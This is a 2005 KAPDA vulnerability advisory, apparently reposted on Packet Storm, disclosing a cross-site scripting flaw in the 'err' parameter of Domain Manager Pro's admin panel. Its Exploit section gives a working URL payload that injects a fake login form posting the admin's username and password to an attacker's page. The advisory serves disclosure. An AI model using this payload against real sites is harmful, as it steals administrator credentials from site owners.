[KAPDA::#8] Domain Manager Pro Vulnerability - A remote user can conduct cross-site scripting attacks.The 'panel' script does not properly validate user-supplied input at the 'err' parameter.So remote user can inject html script to fake login form and steal admin's password.
884d2c7cab6a1fb8491aefd45b26685f951bc1ff50e09b9c0295fdebbf165705[KAPDA::#8] Domain Manager Pro Vulnerability
Domain Manager Pro - Fake form injection
KAPDA New advisory
Vulnerable Products : Domain Manager Pro
Vendor: SiteTurn ,http://www.siteturn.com/
Vulnerability: Fake form injection ( XSS)
Date :
--------------------
2005/08/08
1384/05/17 (Hijri Shamsi)
About Domain Manager Pro:
--------------------
SiteTurn's custom designed account control solution, for your Linux based website.
Domain Manager Pro gives you all of the tools you'll need to manage, grow, and
maintain your website and business to the maximum potential, well into the future.
Vendor`s Description : http://www.siteturn.com/pop/serverSoft/domMan.htm
Disscution:
--------------------
A remote user can conduct cross-site scripting attacks.The 'panel' script does not properly
validate user-supplied input at the 'err' parameter.So remote user can inject html script to
fake login form and steal admin`s password.
Exploit:
--------------------
http://[target]/admin/panel?err=Please Login Again<br><font color="black"><form method="POST"
action=[Your Page That Saves Data]>Username: <input name="user"><br>Password: <input name="pass">
<br><input type="Submit" name="subit" value="Login"><noscript>
Solution:
--------------------
Not patched yet by vendor.
More Detail:
--------------------
http://www.kapda.ir/advisory-96.html
Visit above link for more details.
Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [ at } kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed